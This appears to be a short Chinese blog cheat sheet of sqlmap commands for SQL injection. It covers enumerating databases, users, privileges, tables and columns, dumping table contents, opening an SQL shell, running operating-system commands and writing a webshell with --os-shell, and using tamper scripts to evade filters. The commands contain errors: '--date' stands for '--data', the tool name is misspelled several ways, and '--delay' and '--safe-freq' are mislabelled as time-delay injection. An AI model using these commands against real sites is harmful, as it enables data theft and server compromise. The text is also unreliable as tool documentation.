如果是post提交数据,则查询时在后面跟上 –-date “变量名=值”
如果是cookie 则则查询时在后面跟上 –-cookie“变量名=值”

--Current –db 查看当前数据库
--current –users 查看当前数据库用户名
--count –D “数据库名” 统计数据库内数据的条数
--privileges 查看当前数据库用户的权限
--table –D “数据库名” 获取数据库中的表
查看数据库中有哪些字段:--columns –T “表名” –D “数据库名”
将表中的数据输出出来:--dump –C “列名” –T “表名” –D “数据库名”
链接数据库: sqlmap.py –d “mysql://用户名:密码@地址:端口/数据库名” (需安装pymysql插件才可以用sqlmap 连接)

连接数据库后可以进行sql执行管理:sqlmap.py –d “mysql://用户名:密码@地址:端口/数据库名” --sql –shell
延时注入语句:sqmap.py –u “链接地址” --delay 1 (1是指延迟1秒,还可以是2,3,10等)
延时注入语句二:-safe –freq

Sqlmap进行命令执行(提权):sqmap.py –u “链接地址” –os –cmd=”命令语句” 后面执行需盘符绝对路径如 D:WWW\

Sqpmap写webshell:sqmap.py –u “链接地址” –os –shell

Sqlmap Tamper脚本使用: sqmap.py –u “链接地址” --tamper =”文件名” (文件都在sqlmp的tamper 目录下)

最后修改:2022 年 06 月 23 日
如果觉得我的文章对你有用,请随意赞赏